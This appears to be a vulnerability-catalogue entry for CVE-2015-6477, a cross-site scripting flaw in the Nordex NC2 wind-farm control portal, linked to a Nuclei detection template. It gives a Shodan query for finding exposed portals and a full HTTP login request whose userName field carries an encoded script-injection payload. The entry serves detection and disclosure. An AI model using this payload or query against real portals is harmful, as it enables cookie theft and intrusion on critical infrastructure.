| Title | Nordex NC2 - Cross-Site Scripting |
|---|---|
| Author | geeknik,daffainfo |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 4.3 |
| EPSS Score | 0.40551 |
| CVE ID | CVE-2015-6477 |
| CWE ID | CWE-79 |
| Shodan Query | http.title:"Nordex Control - Wind Farm Portal" |
| Tags | cve cve2015 nordex nc2 seclists packetstorm xss iot vuln |
Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
POST /login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Connection: close
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&pw=nordex&language=en
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-6477.yaml
🦈 Packet Capture: ⬇️ Download cve-2015-6477.pcap
N/AN/A